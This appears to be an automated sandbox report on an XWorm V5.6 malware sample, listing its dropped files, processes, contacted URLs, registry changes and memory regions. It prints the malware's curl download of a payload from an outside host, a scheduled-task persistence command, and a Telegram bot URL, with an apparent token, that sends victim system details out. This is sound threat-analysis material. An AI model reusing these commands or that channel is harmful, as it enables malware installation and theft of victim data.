Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
18sFhgSyVK.exe
|
PE32+ executable (console) x86-64, for MS Windows
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Local\Temp\svchost.exe
|
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
|
|
|
C:\Windows\StartMenuExperienceHost.exe
|
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
|
|
|
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\svchost.exe.log
|
CSV text
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\Log.tmp
|
ASCII text, with CRLF line terminators
|
modified
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk
|
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Sat Nov 23 19:03:11
2024, mtime=Sat Nov 23 19:03:12 2024, atime=Sat Nov 23 19:03:11 2024, length=79872, window=hide
|
dropped
|
||
|
C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\MpCmdRun.log
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
modified
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Users\user\Desktop\18sFhgSyVK.exe
|
"C:\Users\user\Desktop\18sFhgSyVK.exe"
|
|
|
|
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c curl https://r2.hypixel.cfd/svchost.exe -o C:\Windows\StartMenuExperienceHost.exe --silent
|
|
|
|
C:\Windows\System32\svchost.exe
|
C:\Windows\System32\svchost.exe -k NetworkService -p
|
|
|
|
C:\Windows\System32\svchost.exe
|
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
|
|
|
|
C:\Windows\System32\svchost.exe
|
C:\Windows\system32\svchost.exe -k UnistackSvcGroup
|
|
|
|
C:\Windows\System32\svchost.exe
|
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc
|
|
|
|
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c color b
|
|
|
|
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c C:\Windows\StartMenuExperienceHost.exe
|
|
|
|
C:\Windows\StartMenuExperienceHost.exe
|
C:\Windows\StartMenuExperienceHost.exe
|
|
|
|
C:\Windows\System32\svchost.exe
|
C:\Windows\system32\svchost.exe -k LocalService -s W32Time
|
|
|
|
C:\Windows\System32\schtasks.exe
|
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\user~1\AppData\Local\Temp\svchost.exe"
|
|
|
|
C:\Users\user\AppData\Local\Temp\svchost.exe
|
C:\Users\user~1\AppData\Local\Temp\svchost.exe
|
|
|
|
C:\Users\user\AppData\Local\Temp\svchost.exe
|
"C:\Users\user~1\AppData\Local\Temp\svchost.exe"
|
|
|
|
C:\Users\user\AppData\Local\Temp\svchost.exe
|
"C:\Users\user~1\AppData\Local\Temp\svchost.exe"
|
|
|
|
C:\Users\user\AppData\Local\Temp\svchost.exe
|
C:\Users\user~1\AppData\Local\Temp\svchost.exe
|
|
|
|
C:\Users\user\AppData\Local\Temp\svchost.exe
|
C:\Users\user~1\AppData\Local\Temp\svchost.exe
|
|
|
|
C:\Users\user\AppData\Local\Temp\svchost.exe
|
C:\Users\user~1\AppData\Local\Temp\svchost.exe
|
|
|
|
C:\Users\user\AppData\Local\Temp\svchost.exe
|
C:\Users\user~1\AppData\Local\Temp\svchost.exe
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\curl.exe
|
curl https://r2.hypixel.cfd/svchost.exe -o C:\Windows\StartMenuExperienceHost.exe --silent
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Program Files\Windows Defender\MpCmdRun.exe
|
"C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
There are 13 hidden processes, click here to show them.
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
104.198.168.179
|
|
||
|
https://r2.hypixel.cfd/svchost.exe
|
172.66.0.158
|
|
|
|
https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
|
unknown
|
||
|
https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&
|
unknown
|
||
|
https://api.telegram.org/bot
|
unknown
|
||
|
https://dev.ditu.live.com/REST/v1/Routes/
|
unknown
|
||
|
https://dev.virtualearth.net/REST/v1/Routes/Driving
|
unknown
|
||
|
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
|
unknown
|
||
|
https://r2.hypixel.cfd/svchost.exe(
|
unknown
|
||
|
https://dev.ditu.live.com/REST/v1/Transit/Stops/
|
unknown
|
||
|
https://dev.virtualearth.net/REST/v1/Routes/
|
unknown
|
||
|
https://dev.virtualearth.net/REST/v1/Traffic/Incidents/
|
unknown
|
||
|
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
|
unknown
|
||
|
https://dev.virtualearth.net/REST/v1/Routes/Walking
|
unknown
|
||
|
https://dynamic.api.tiles.ditu.live.com/odvs/gri?pv=1&r=
|
unknown
|
||
|
https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
|
unknown
|
||
|
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
|
unknown
|
||
|
https://ecn.dev.virtualearth.net/REST/V1/MapControlConfiguration/native/
|
unknown
|
||
|
https://dev.virtualearth.net/REST/v1/Locations
|
unknown
|
||
|
https://dev.ditu.live.com/REST/V1/MapControlConfiguration/native/
|
unknown
|
||
|
https://dev.virtualearth.net/mapcontrol/logging.ashx
|
unknown
|
||
|
https://dev.ditu.live.com/mapcontrol/logging.ashx
|
unknown
|
||
|
https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
|
unknown
|
||
|
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
|
unknown
|
||
|
https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
|
unknown
|
||
|
https://dev.virtualearth.net/REST/v1/Transit/Schedules/
|
unknown
|
||
|
https://dynamic.t
|
unknown
|
||
|
https://r2.hypixel.cfd/svchost.exe-oC:
|
unknown
|
||
|
https://dev.virtualearth.net/REST/v1/Routes/Transit
|
unknown
|
||
|
https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
|
unknown
|
||
|
https://tiles.virtualearth.net/tiles/cmd/StreetSideBubbleMetaData?north=
|
unknown
|
||
|
https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
http://www.bingmapsportal.com
|
unknown
|
||
|
https://dev.ditu.live.com/REST/v1/Locations
|
unknown
|
||
|
https://dev.virtualearth.net/REST/v1/Imagery/Copyright/
|
unknown
|
||
|
https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
|
unknown
|
||
|
https://api.telegram.org/botAAFa5s6Qc5oDxqbipfR5RrOfgeTLKQlipKI/sendMessage?chat_id=7856673158&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A66ED47A5B18832423BF5%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%209TXRTVEZ%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.6
|
149.154.167.220
|
||
|
127.0.0.1
|
|||
|
http://ip-api.com/line/?fields=hosting
|
208.95.112.1
|
||
|
https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/
|
unknown
|
||
|
https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
|
unknown
|
There are 32 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
r2.hypixel.cfd
|
172.66.0.158
|
|
|
|
ip-api.com
|
208.95.112.1
|
||
|
api.telegram.org
|
149.154.167.220
|
||
|
time.windows.com
|
unknown
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
172.66.0.158
|
r2.hypixel.cfd
|
United States
|
|
|
|
127.0.0.1
|
unknown
|
unknown
|
|
|
|
208.95.112.1
|
ip-api.com
|
United States
|
||
|
149.154.167.220
|
api.telegram.org
|
United Kingdom
|
||
|
104.198.168.179
|
unknown
|
United States
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Provider\Av\{D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
|
STATE
|
|
|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center
|
cval
|
|
|
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
|
svchost
|
|
|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\StartMenuExperienceHost_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\StartMenuExperienceHost_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\StartMenuExperienceHost_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\StartMenuExperienceHost_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\StartMenuExperienceHost_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\StartMenuExperienceHost_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\StartMenuExperienceHost_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\StartMenuExperienceHost_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\StartMenuExperienceHost_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\StartMenuExperienceHost_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\StartMenuExperienceHost_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\StartMenuExperienceHost_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\StartMenuExperienceHost_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\StartMenuExperienceHost_RASMANCS
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\W32Time\Config
|
LastKnownGoodTime
|
There are 8 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
B32000
|
unkown
|
page readonly
|
|
|
|
2E89000
|
trusted library allocation
|
page read and write
|
|
|
|
2E21000
|
trusted library allocation
|
page read and write
|
|
|
|
16CB93A4000
|
heap
|
page read and write
|
||
|
4CC7DDF000
|
unkown
|
page read and write
|
||
|
1298000
|
heap
|
page read and write
|
||
|
135A5420000
|
heap
|
page read and write
|
||
|
319E000
|
stack
|
page read and write
|
||
|
FF0000
|
heap
|
page read and write
|
||
|
1302000
|
heap
|
page read and write
|
||
|
3010000
|
trusted library allocation
|
page read and write
|
||
|
13201000
|
trusted library allocation
|
page read and write
|
||
|
1200000
|
heap
|
page read and write
|
||
|
30F0000
|
heap
|
page execute and read and write
|
||
|
135A5670000
|
heap
|
page read and write
|
||
|
135A5675000
|
heap
|
page read and write
|
||
|
F3A5DFE000
|
unkown
|
page readonly
|
||
|
7FFAAC440000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFAAC294000
|
trusted library allocation
|
page read and write
|
||
|
1102000
|
heap
|
page read and write
|
||
|
7FFAAC2B4000
|
trusted library allocation
|
page read and write
|
||
|
1A98DD30000
|
heap
|
page read and write
|
||
|
2066BFE000
|
stack
|
page read and write
|
||
|
1120000
|
heap
|
page read and write
|
||
|
1BCFE000
|
stack
|
page read and write
|
||
|
16CB93E1000
|
heap
|
page read and write
|
||
|
F3A5CFE000
|
stack
|
page read and write
|
||
|
FFE000
|
stack
|
page read and write
|
||
|
FE0000
|
heap
|
page read and write
|
||
|
1BD28000
|
heap
|
page read and write
|
||
|
12A5000
|
heap
|
page read and write
|
||
|
2AA1000
|
trusted library allocation
|
page read and write
|
||
|
2117C261000
|
heap
|
page read and write
|
||
|
1100000
|
heap
|
page read and write
|
||
|
BD0000
|
heap
|
page read and write
|
||
|
16CB93DE000
|
heap
|
page read and write
|
||
|
7FF77C927000
|
unkown
|
page read and write
|
||
|
13452FF000
|
stack
|
page read and write
|
||
|
1BEFE000
|
stack
|
page read and write
|
||
|
C3B000
|
heap
|
page read and write
|
||
|
BD4497E000
|
unkown
|
page readonly
|
||
|
7FFAAC440000
|
trusted library allocation
|
page read and write
|
||
|
1C42B000
|
stack
|
page read and write
|
||
|
1221000
|
heap
|
page read and write
|
||
|
7FF77C911000
|
unkown
|
page execute read
|
||
|
1610000
|
heap
|
page read and write
|
||
|
12AA8000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC452000
|
trusted library allocation
|
page read and write
|
||
|
16CB9427000
|
heap
|
page read and write
|
||
|
7FFAAC2A3000
|
trusted library allocation
|
page execute and read and write
|
||
|
D70000
|
unkown
|
page readonly
|
||
|
1244000
|
heap
|
page read and write
|
||
|
21EDC313000
|
heap
|
page read and write
|
||
|
2066AFF000
|
stack
|
page read and write
|
||
|
25157D00000
|
heap
|
page read and write
|
||
|
30B0000
|
trusted library allocation
|
page read and write
|
||
|
1580000
|
heap
|
page execute and read and write
|
||
|
135A5659000
|
heap
|
page read and write
|
||
|
1BAFE000
|
stack
|
page read and write
|
||
|
1BEFE000
|
stack
|
page read and write
|
||
|
1BA02000
|
heap
|
page read and write
|
||
|
C13000
|
heap
|
page read and write
|
||
|
2AA1000
|
trusted library allocation
|
page read and write
|
||
|
2B128E64000
|
heap
|
page read and write
|
||
|
313F000
|
stack
|
page read and write
|
||
|
CC6000
|
heap
|
page read and write
|
||
|
1200000
|
heap
|
page read and write
|
||
|
7FFB167B5000
|
unkown
|
page readonly
|
||
|
7FFAAC360000
|
trusted library allocation
|
page execute and read and write
|
||
|
B80000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC3D0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFAAC2C4000
|
trusted library allocation
|
page read and write
|
||
|
12A0000
|
heap
|
page read and write
|
||
|
1C02E000
|
stack
|
page read and write
|
||
|
287AB7E000
|
unkown
|
page readonly
|
||
|
255EE020000
|
heap
|
page read and write
|
||
|
2B128E02000
|
heap
|
page read and write
|
||
|
2117C1E0000
|
trusted library allocation
|
page read and write
|
||
|
131A1000
|
trusted library allocation
|
page read and write
|
||
|
12AA3000
|
trusted library allocation
|
page read and write
|
||
|
21EDC240000
|
heap
|
page read and write
|
||
|
7FFB167B2000
|
unkown
|
page readonly
|
||
|
31A1000
|
trusted library allocation
|
page read and write
|
||
|
1A98DDC5000
|
heap
|
page read and write
|
||
|
2B128E00000
|
heap
|
page read and write
|
||
|
1200000
|
heap
|
page read and write
|
||
|
2117C251000
|
heap
|
page read and write
|
||
|
BD4517E000
|
unkown
|
page readonly
|
||
|
135A5686000
|
heap
|
page read and write
|
||
|
BD456FE000
|
stack
|
page read and write
|
||
|
1BCEE000
|
stack
|
page read and write
|
||
|
1510000
|
heap
|
page read and write
|
||
|
1241000
|
heap
|
page read and write
|
||
|
89EA87E000
|
stack
|
page read and write
|
||
|
13203000
|
trusted library allocation
|
page read and write
|
||
|
BE0000
|
heap
|
page read and write
|
||
|
2117C22B000
|
heap
|
page read and write
|
||
|
10A8000
|
heap
|
page read and write
|
||
|
2BB3000
|
heap
|
page read and write
|
||
|
16CB9350000
|
remote allocation
|
page read and write
|
||
|
FF0000
|
heap
|
page read and write
|
||
|
7FF77C927000
|
unkown
|
page write copy
|
||
|
121F000
|
heap
|
page read and write
|
||
|
25157E37000
|
heap
|
page read and write
|
||
|
7FFAAC370000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFAAC2C1000
|
trusted library allocation
|
page read and write
|
||
|
135A5600000
|
heap
|
page read and write
|
||
|
7FFAAC2CD000
|
trusted library allocation
|
page execute and read and write
|
||
|
135A5662000
|
heap
|
page read and write
|
||
|
1302000
|
heap
|
page read and write
|
||
|
123E000
|
heap
|
page read and write
|
||
|
7FFAAC460000
|
trusted library allocation
|
page read and write
|
||
|
C13000
|
heap
|
page read and write
|
||
|
150F000
|
stack
|
page read and write
|
||
|
7FF77C928000
|
unkown
|
page readonly
|
||
|
1024000
|
heap
|
page read and write
|
||
|
21EDC22B000
|
heap
|
page read and write
|
||
|
21EDC202000
|
heap
|
page read and write
|
||
|
314D000
|
trusted library allocation
|
page read and write
|
||
|
2AA5000
|
trusted library allocation
|
page read and write
|
||
|
BD4557D000
|
stack
|
page read and write
|
||
|
1BA02000
|
heap
|
page read and write
|
||
|
CB5000
|
heap
|
page read and write
|
||
|
C3D000
|
heap
|
page read and write
|
||
|
25157E6E000
|
heap
|
page read and write
|
||
|
7FFAAC29D000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFB167A6000
|
unkown
|
page readonly
|
||
|
7FFAAC432000
|
trusted library allocation
|
page read and write
|
||
|
2FAF000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC31C000
|
trusted library allocation
|
page execute and read and write
|
||
|
F70000
|
heap
|
page execute and read and write
|
||
|
3030000
|
heap
|
page execute and read and write
|
||
|
1540000
|
heap
|
page execute and read and write
|
||
|
1270000
|
trusted library allocation
|
page read and write
|
||
|
1236000
|
heap
|
page read and write
|
||
|
1A98DD50000
|
heap
|
page read and write
|
||
|
C75000
|
heap
|
page read and write
|
||
|
AF1000
|
stack
|
page read and write
|
||
|
1B9C0000
|
heap
|
page read and write
|
||
|
C3A000
|
heap
|
page read and write
|
||
|
2B128C90000
|
heap
|
page read and write
|
||
|
7FFAAC366000
|
trusted library allocation
|
page execute and read and write
|
||
|
BD4587E000
|
stack
|
page read and write
|
||
|
BD44D7D000
|
stack
|
page read and write
|
||
|
12AB000
|
heap
|
page read and write
|
||
|
10C4000
|
heap
|
page read and write
|
||
|
1BDFE000
|
stack
|
page read and write
|
||
|
2B128E13000
|
heap
|
page read and write
|
||
|
1C7FF000
|
stack
|
page read and write
|
||
|
2117C1B0000
|
heap
|
page read and write
|
||
|
16CB9390000
|
heap
|
page read and write
|
||
|
21EDC300000
|
heap
|
page read and write
|
||
|
2117C24C000
|
heap
|
page read and write
|
||
|
2117C860000
|
remote allocation
|
page read and write
|
||
|
10C6000
|
heap
|
page read and write
|
||
|
7FFAAC3A6000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFAAC30C000
|
trusted library allocation
|
page execute and read and write
|
||
|
11F0000
|
heap
|
page read and write
|
||
|
7FFAAC2BB000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFAAC2AD000
|
trusted library allocation
|
page execute and read and write
|
||
|
255EE0EC000
|
heap
|
page read and write
|
||
|
320D000
|
trusted library allocation
|
page read and write
|
||
|
122C000
|
heap
|
page read and write
|
||
|
7FFAAC2B3000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFAAC2C4000
|
trusted library allocation
|
page read and write
|
||
|
BD450FD000
|
stack
|
page read and write
|
||
|
1258000
|
heap
|
page read and write
|
||
|
1102000
|
heap
|
page read and write
|
||
|
F30000
|
trusted library allocation
|
page read and write
|
||
|
13AC000
|
stack
|
page read and write
|
||
|
7FFAAC386000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFAAC460000
|
trusted library allocation
|
page read and write
|
||
|
16CB93F3000
|
heap
|
page read and write
|
||
|
CB3000
|
heap
|
page read and write
|
||
|
1BDFE000
|
stack
|
page read and write
|
||
|
1BCFE000
|
stack
|
page read and write
|
||
|
2B129600000
|
heap
|
page read and write
|
||
|
12AA1000
|
trusted library allocation
|
page read and write
|
||
|
2B128E7C000
|
heap
|
page read and write
|
||
|
16CB940D000
|
heap
|
page read and write
|
||
|
206673C000
|
stack
|
page read and write
|
||
|
1BBFF000
|
stack
|
page read and write
|
||
|
4CC7D59000
|
stack
|
page read and write
|
||
|
135A5702000
|
heap
|
page read and write
|
||
|
1502000
|
heap
|
page read and write
|
||
|
16CB93E1000
|
heap
|
page read and write
|
||
|
2117C261000
|
heap
|
page read and write
|
||
|
BD4567E000
|
unkown
|
page readonly
|
||
|
1B802000
|
heap
|
page read and write
|
||
|
1A98DDF0000
|
heap
|
page read and write
|
||
|
1B1A6000
|
heap
|
page read and write
|
||
|
1C6FE000
|
stack
|
page read and write
|
||
|
287A6FE000
|
stack
|
page read and write
|
||
|
1C602000
|
heap
|
page read and write
|
||
|
7FFAAC28D000
|
trusted library allocation
|
page execute and read and write
|
||
|
135A5660000
|
heap
|
page read and write
|
||
|
1120000
|
heap
|
page read and write
|
||
|
122C000
|
heap
|
page read and write
|
||
|
1580000
|
heap
|
page read and write
|
||
|
1CA96000
|
heap
|
page read and write
|
||
|
131A3000
|
trusted library allocation
|
page read and write
|
||
|
1BBED000
|
stack
|
page read and write
|
||
|
1AF1D000
|
stack
|
page read and write
|
||
|
31B1000
|
trusted library allocation
|
page read and write
|
||
|
1702000
|
heap
|
page read and write
|
||
|
1702000
|
heap
|
page read and write
|
||
|
7FFAAC450000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFAAC2A3000
|
trusted library allocation
|
page read and write
|
||
|
135A56A8000
|
heap
|
page read and write
|
||
|
21EDC4E0000
|
heap
|
page read and write
|
||
|
FD0000
|
heap
|
page read and write
|
||
|
1C32E000
|
stack
|
page read and write
|
||
|
F20000
|
heap
|
page read and write
|
||
|
BB0000
|
heap
|
page read and write
|
||
|
C36000
|
heap
|
page read and write
|
||
|
12AF000
|
heap
|
page read and write
|
||
|
BD44E7E000
|
unkown
|
page readonly
|
||
|
C50000
|
heap
|
page read and write
|
||
|
BE0000
|
heap
|
page read and write
|
||
|
105D000
|
heap
|
page read and write
|
||
|
135A565C000
|
heap
|
page read and write
|
||
|
7FFAAC2BD000
|
trusted library allocation
|
page execute and read and write
|
||
|
25157E13000
|
heap
|
page read and write
|
||
|
1BCFE000
|
stack
|
page read and write
|
||
|
2C20000
|
heap
|
page read and write
|
||
|
16FE000
|
stack
|
page read and write
|
||
|
7FFAAC380000
|
trusted library allocation
|
page execute and read and write
|
||
|
1BD0A000
|
heap
|
page read and write
|
||
|
15CE000
|
stack
|
page read and write
|
||
|
1224000
|
heap
|
page read and write
|
||
|
7FF77C911000
|
unkown
|
page execute read
|
||
|
DF0000
|
heap
|
page read and write
|
||
|
12BC000
|
heap
|
page read and write
|
||
|
1400000
|
heap
|
page read and write
|
||
|
287B17E000
|
unkown
|
page readonly
|
||
|
135A564A000
|
heap
|
page read and write
|
||
|
1A98DD20000
|
heap
|
page read and write
|
||
|
21EDC302000
|
heap
|
page read and write
|
||
|
BD448FD000
|
stack
|
page read and write
|
||
|
2A9E000
|
stack
|
page read and write
|
||
|
7FF46FC70000
|
trusted library allocation
|
page execute and read and write
|
||
|
FF0000
|
heap
|
page read and write
|
||
|
1302000
|
heap
|
page read and write
|
||
|
135A565B000
|
heap
|
page read and write
|
||
|
255EE0E0000
|
heap
|
page read and write
|
||
|
131A3000
|
trusted library allocation
|
page read and write
|
||
|
2117CA02000
|
trusted library allocation
|
page read and write
|
||
|
1030000
|
heap
|
page read and write
|
||
|
F60000
|
heap
|
page read and write
|
||
|
287AC7E000
|
stack
|
page read and write
|
||
|
287AE7E000
|
stack
|
page read and write
|
||
|
31AF000
|
trusted library allocation
|
page read and write
|
||
|
31AD000
|
trusted library allocation
|
page read and write
|
||
|
21EDC26C000
|
heap
|
page read and write
|
||
|
10AA000
|
heap
|
page read and write
|
||
|
7FFAAC2E0000
|
trusted library allocation
|
page read and write
|
||
|
31AF000
|
trusted library allocation
|
page read and write
|
||
|
287AF7E000
|
unkown
|
page readonly
|
||
|
13453FF000
|
stack
|
page read and write
|
||
|
16CB93A7000
|
heap
|
page read and write
|
||
|
7FFAAC346000
|
trusted library allocation
|
page read and write
|
||
|
135A5650000
|
heap
|
page read and write
|
||
|
31AD000
|
trusted library allocation
|
page read and write
|
||
|
16CB93AE000
|
heap
|
page read and write
|
||
|
1C12C000
|
stack
|
page read and write
|
||
|
7FF77C928000
|
unkown
|
page readonly
|
||
|
2AAD000
|
trusted library allocation
|
page read and write
|
||
|
2E10000
|
heap
|
page execute and read and write
|
||
|
1702000
|
heap
|
page read and write
|
||
|
F40000
|
heap
|
page read and write
|
||
|
7FFB167B0000
|
unkown
|
page read and write
|
||
|
25157E53000
|
heap
|
page read and write
|
||
|
89EA13B000
|
stack
|
page read and write
|
||
|
25157F02000
|
heap
|
page read and write
|
||
|
1038000
|
heap
|
page read and write
|
||
|
1062000
|
heap
|
page read and write
|
||
|
3141000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC2DD000
|
trusted library allocation
|
page execute and read and write
|
||
|
B20000
|
heap
|
page read and write
|
||
|
135A565F000
|
heap
|
page read and write
|
||
|
7FFAAC442000
|
trusted library allocation
|
page read and write
|
||
|
C37000
|
heap
|
page read and write
|
||
|
1B8EA000
|
stack
|
page read and write
|
||
|
21EDC200000
|
heap
|
page read and write
|
||
|
135A568B000
|
heap
|
page read and write
|
||
|
150F000
|
stack
|
page read and write
|
||
|
1BEFE000
|
stack
|
page read and write
|
||
|
1344F3C000
|
stack
|
page read and write
|
||
|
2117C0D0000
|
heap
|
page read and write
|
||
|
7FFAAC396000
|
trusted library allocation
|
page execute and read and write
|
||
|
2DE0000
|
heap
|
page read and write
|
||
|
BD4577E000
|
unkown
|
page readonly
|
||
|
16CB9350000
|
remote allocation
|
page read and write
|
||
|
7FFAAC30C000
|
trusted library allocation
|
page execute and read and write
|
||
|
13143000
|
trusted library allocation
|
page read and write
|
||
|
C4F000
|
heap
|
page read and write
|
||
|
25157E5E000
|
heap
|
page read and write
|
||
|
7FFAAC430000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC2B3000
|
trusted library allocation
|
page execute and read and write
|
||
|
13208000
|
trusted library allocation
|
page read and write
|
||
|
309F000
|
stack
|
page read and write
|
||
|
1221000
|
heap
|
page read and write
|
||
|
7FFAAC2BD000
|
trusted library allocation
|
page execute and read and write
|
||
|
21EDDCD0000
|
trusted library allocation
|
page read and write
|
||
|
1BA02000
|
heap
|
page read and write
|
||
|
21EDDD10000
|
remote allocation
|
page read and write
|
||
|
2AAF000
|
trusted library allocation
|
page read and write
|
||
|
DD0000
|
heap
|
page read and write
|
||
|
1C8FF000
|
stack
|
page read and write
|
||
|
25157E16000
|
heap
|
page read and write
|
||
|
D02000
|
heap
|
page read and write
|
||
|
10F1000
|
stack
|
page read and write
|
||
|
2117C24B000
|
heap
|
page read and write
|
||
|
7FFAAC3E0000
|
trusted library allocation
|
page execute and read and write
|
||
|
1570000
|
trusted library allocation
|
page read and write
|
||
|
12FA8000
|
trusted library allocation
|
page read and write
|
||
|
16CB93DE000
|
heap
|
page read and write
|
||
|
7FFAAC2CD000
|
trusted library allocation
|
page execute and read and write
|
||
|
2B128DA0000
|
trusted library allocation
|
page read and write
|
||
|
2AB1000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC2A4000
|
trusted library allocation
|
page read and write
|
||
|
1500000
|
trusted library allocation
|
page read and write
|
||
|
287A38B000
|
stack
|
page read and write
|
||
|
7FFAAC420000
|
trusted library allocation
|
page read and write
|
||
|
1602000
|
heap
|
page read and write
|
||
|
7FFAAC2D0000
|
trusted library allocation
|
page read and write
|
||
|
1CC90000
|
heap
|
page execute and read and write
|
||
|
1BCFE000
|
stack
|
page read and write
|
||
|
2117C225000
|
heap
|
page read and write
|
||
|
7FFAAC396000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFAAC290000
|
trusted library allocation
|
page read and write
|
||
|
160F000
|
stack
|
page read and write
|
||
|
16CB93E1000
|
heap
|
page read and write
|
||
|
1590000
|
heap
|
page execute and read and write
|
||
|
7FFAAC30C000
|
trusted library allocation
|
page execute and read and write
|
||
|
1000000
|
heap
|
page read and write
|
||
|
1BD89000
|
heap
|
page read and write
|
||
|
255EE0F4000
|
heap
|
page read and write
|
||
|
287AD7E000
|
unkown
|
page readonly
|
||
|
CC0000
|
heap
|
page read and write
|
||
|
135A565D000
|
heap
|
page read and write
|
||
|
1BFFF000
|
stack
|
page read and write
|
||
|
2AB1000
|
trusted library allocation
|
page read and write
|
||
|
16CB93DD000
|
heap
|
page read and write
|
||
|
DE0000
|
heap
|
page read and write
|
||
|
7FFB16790000
|
unkown
|
page readonly
|
||
|
2B128F13000
|
heap
|
page read and write
|
||
|
7FFAAC34C000
|
trusted library allocation
|
